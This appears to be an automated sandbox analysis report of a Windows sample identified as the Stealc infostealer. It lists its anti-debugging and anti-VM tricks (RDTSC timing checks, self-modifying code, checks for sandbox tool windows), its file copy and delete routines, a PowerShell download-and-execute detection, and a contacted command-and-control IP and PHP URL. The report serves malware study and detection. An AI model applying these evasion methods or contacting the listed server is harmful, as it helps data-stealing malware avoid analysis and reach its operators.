Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137B8F2 second address: 137B930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F849CDA4207h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007F849CDA41F6h 0x00000012 jmp 00007F849CDA4205h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137B930 second address: 137B934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137D94B second address: 137D965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137D965 second address: 137D98C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnc 00007F849C4F2D96h 0x0000000b pop esi 0x0000000c jmp 00007F849C4F2D9Fh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jp 00007F849C4F2D96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137D98C second address: 137D995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137D995 second address: 137D99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137D99B second address: 137D99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 513028A second address: 51302E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F849C4F2D9Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 call 00007F849C4F2D9Dh 0x00000019 mov bx, cx 0x0000001c pop ecx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F849C4F2DA5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51302E7 second address: 51302EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51302EB second address: 51302F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5130317 second address: 513031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 513031D second address: 5130354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849C4F2D9Ch 0x00000008 call 00007F849C4F2DA2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 jmp 00007F849C4F2D9Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5130354 second address: 5130358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5130358 second address: 513038A instructions: 0x00000000 rdtsc 0x00000002 mov si, 3CADh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F849C4F2DA8h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edx, 08CC7090h 0x0000001b mov cx, di 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F080 second address: 129F087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F087 second address: 129F091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F849C4F2D96h 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10F1BF1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12933CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1291903 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10EF29A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1316D73 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00EA38B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EA4910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E9DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00E9E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00EA4570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00E9ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E916D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00EA3EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E9F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E9BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E9DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E91160 GetSystemInfo,ExitProcess, 0_2_00E91160
Source: file.exe, file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2175832040.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2175832040.0000000000C15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2175832040.0000000000C15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E945C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00E945C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00EA9860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9750 mov eax, dword ptr fs:[00000030h] 0_2_00EA9750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00EA78E0
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00EA9600
Source: file.exe, file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: isProgram Manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00EA7B90
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00EA7980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00EA7850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00EA7A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542683 Sample: file.exe Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 11 Suricata IDS alerts for network traffic 2->11 13 Found malware configuration 2->13 15 Antivirus / Scanner detection for submitted sample 2->15 17 7 other signatures 2->17 5 file.exe 13 2->5         started        process3 dnsIp4 9 185.215.113.206, 49709, 80 WHOLESALECONNECTIONSNL Portugal 5->9 19 Detected unpacking (changes PE section rights) 5->19 21 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->21 23 Tries to evade debugger and weak emulator (self modifying code) 5->23 25 6 other signatures 5->25 signatures5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ true
    		unknown
    http://185.215.113.206/e2b1563c6670f193.php true
      		unknown